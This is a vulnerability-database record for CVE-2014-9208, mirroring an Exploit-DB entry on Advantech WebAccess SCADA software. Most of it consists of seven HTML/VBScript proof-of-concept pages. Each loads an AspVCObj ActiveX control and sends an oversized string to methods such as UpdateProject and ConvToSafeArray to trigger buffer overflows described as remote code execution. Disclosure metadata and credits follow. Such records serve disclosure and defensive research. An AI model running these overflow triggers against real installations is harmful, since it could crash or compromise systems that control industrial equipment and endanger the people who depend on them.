Sign-up

ID

VAR-E-201509-0067


CVE

cve_id:CVE-2014-9208

Trust: 2.4

sources: BID: 76672 // PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

EDB ID

38108


TITLE

Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38108

DESCRIPTION

Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities. CVE-2014-9208CVE-127229CVE-127228CVE-127227CVE-127226CVE-127225CVE-127224CVE-127223 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 38108

AFFECTED PRODUCTS

vendor:advantechmodel:webaccessscope:eqversion:8.0/3.4.3

Trust: 1.5

vendor:advantechmodel:webaccess activexscope:eqversion:8.03.4.3

Trust: 0.6

sources: PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

EXPLOIT

Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>
</html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.

Trust: 1.0

sources: EXPLOIT-DB: 38108

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38108

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38108

TYPE

ActiveX Multiple Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 38108

TAGS

tag:exploit

Trust: 0.5

tag:activex

Trust: 0.5

sources: PACKETSTORM: 133475

CREDITS

Praveen Darshanam

Trust: 0.6

sources: EXPLOIT-DB: 38108

EXTERNAL IDS

db:NVDid:CVE-2014-9208

Trust: 2.4

db:EXPLOIT-DBid:38108

Trust: 1.6

db:EDBNETid:59243

Trust: 0.6

db:PACKETSTORMid:133475

Trust: 0.5

db:BIDid:76672

Trust: 0.3

sources: BID: 76672 // PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-9208

Trust: 2.1

url:https://www.exploit-db.com/exploits/38108/

Trust: 0.6

sources: PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

SOURCES

db:BIDid:76672
db:PACKETSTORMid:133475
db:EXPLOIT-DBid:38108
db:EDBNETid:59243

LAST UPDATE DATE

2022-07-27T09:18:39.523000+00:00


SOURCES UPDATE DATE

db:BIDid:76672date:2015-11-03T19:36:00

SOURCES RELEASE DATE

db:BIDid:76672date:2015-09-04T00:00:00
db:PACKETSTORMid:133475date:2015-09-07T14:33:33
db:EXPLOIT-DBid:38108date:2015-09-08T00:00:00
db:EDBNETid:59243date:2015-09-08T00:00:00